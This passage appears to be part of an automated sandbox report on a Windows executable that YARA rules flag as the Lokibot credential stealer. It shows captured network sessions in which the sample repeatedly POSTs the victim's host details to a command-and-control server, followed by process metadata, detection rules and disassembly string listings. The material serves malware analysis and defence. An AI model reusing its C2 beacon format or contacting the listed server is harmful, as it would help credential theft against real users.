Apr 26, 2024 04:43:48.687972069 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:48.688009977 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49811	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:48.980951071 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:49.171013117 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:50.099724054 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:49 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:50.100467920 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:50.109718084 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:50.110168934 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:50.110205889 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:50.110377073 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:50.111219883 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:50.111262083 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:50.111299992 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:50.111448050 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49812	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:50.432496071 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:50.620397091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:51.496342897 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:51.496465921 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:51.505086899 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:51.505549908 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:51.505618095 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:51.505705118 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:51.505934000 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:51.506087065 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:51.506170988 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:51.706311941 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:50 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49813	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:52.043340921 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:52.231024027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:53.183917046 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:52 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:53.183980942 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:53.184017897 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:53.192580938 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:53.192883968 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:53.192994118 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:53.193069935 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:53.193280935 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:53.193393946 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:53.193432093 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Target ID:	0
Start time:	04:41:58
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\SCB#89940578.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SCB#89940578.exe"
Imagebase:	0x610000
File size:	706'056 bytes
MD5 hash:	8BDFE306F813BA1A65ECF6E1DA4085C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:42:00
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\SCB#89940578.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SCB#89940578.exe"
Imagebase:	0x4e0000
File size:	706'056 bytes
MD5 hash:	8BDFE306F813BA1A65ECF6E1DA4085C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	53
Total number of Limit Nodes:	2

Executed Functions

Function 04F38D08 Relevance: 40.6, Strings: 31, Instructions: 1826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 04F3A0BC
-, xrefs: 04F3A15F
(, xrefs: 04F3A22C
[, xrefs: 04F39905
., xrefs: 04F3A054
,, xrefs: 04F3A775
(, xrefs: 04F39C21
., xrefs: 04F3A1C7
(, xrefs: 04F39C17
(, xrefs: 04F3A222
-, xrefs: 04F39F7E
,, xrefs: 04F3A52B
,, xrefs: 04F3A535
,, xrefs: 04F3A414
/, xrefs: 04F3A332
,, xrefs: 04F3A63A
., xrefs: 04F39E6D
/, xrefs: 04F39CD6
i, xrefs: 04F39731
K, xrefs: 04F39DEF
(, xrefs: 04F3917F
-, xrefs: 04F39DF9
7, xrefs: 04F3988C
,, xrefs: 04F3A630
7, xrefs: 04F399D6
., xrefs: 04F39FEC
,, xrefs: 04F3A76B
,, xrefs: 04F3A40A
\-, xrefs: 04F3A169
(, xrefs: 04F39178
1, xrefs: 04F39D35

Memory Dump Source

Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd

Similarity

API ID:
String ID: ($($($($($($,$,$,$,$,$,$,$,$-$-$-$.$.$.$.$.$/$/$1$7$7$K$[$\-$i
API String ID: 0-851490389
Opcode ID: af988cbc7677a3043c9d98898ff69ae1eb370756017c63e7f04bd57f5a8ff3a3
Instruction ID: ca2c011eced80dab83d63e263ce5ba0c80b63f2f7ebc627dded15ed9312f308b
Opcode Fuzzy Hash: af988cbc7677a3043c9d98898ff69ae1eb370756017c63e7f04bd57f5a8ff3a3
Instruction Fuzzy Hash: 7C134930A00214CFDB15EF34C894A99B7B2FF89305F5486A9E809AF365DB75AD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04F38CF9 Relevance: 40.5, Strings: 31, Instructions: 1760
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 04F3A0BC
-, xrefs: 04F3A15F
(, xrefs: 04F3A22C
[, xrefs: 04F39905
., xrefs: 04F3A054
,, xrefs: 04F3A775
(, xrefs: 04F39C21
., xrefs: 04F3A1C7
(, xrefs: 04F39C17
(, xrefs: 04F3A222
-, xrefs: 04F39F7E
,, xrefs: 04F3A52B
,, xrefs: 04F3A535
,, xrefs: 04F3A414
/, xrefs: 04F3A332
,, xrefs: 04F3A63A
., xrefs: 04F39E6D
/, xrefs: 04F39CD6
i, xrefs: 04F39731
K, xrefs: 04F39DEF
(, xrefs: 04F3917F
-, xrefs: 04F39DF9
7, xrefs: 04F3988C
,, xrefs: 04F3A630
7, xrefs: 04F399D6
., xrefs: 04F39FEC
,, xrefs: 04F3A76B
,, xrefs: 04F3A40A
\-, xrefs: 04F3A169
(, xrefs: 04F39178
1, xrefs: 04F39D35

Memory Dump Source

